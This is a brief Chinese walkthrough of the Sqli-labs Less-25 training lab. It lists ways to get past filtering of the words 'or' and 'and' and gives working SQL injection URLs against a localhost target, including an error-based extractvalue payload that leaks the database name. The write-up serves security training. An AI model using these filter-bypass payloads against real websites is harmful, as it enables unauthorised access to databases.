Sqli-labs less 25
Less-25
本关主要为or and过滤,如何绕过or和and过滤。一般性提供以下几种思路:
-
大小写变形 Or,OR,oR
-
编码,hex,urlencode
-
添加注释/*or*/
-
利用符号 and=&& or=||
暂时只想到这些,还有的话可以补充。
本关利用方法(4)进行。
报错注入 or示例
http://127.0.0.1/sqllib/Less-25/index.php?id=1'|| extractvalue(1,concat(0x7e,database()))--+
And 示例
http://127.0.0.1/sqllib/Less-25/index.php?id=1&&1=1--+
微信公众号:埋头干安全
目前主要精力放在微信公众号!!!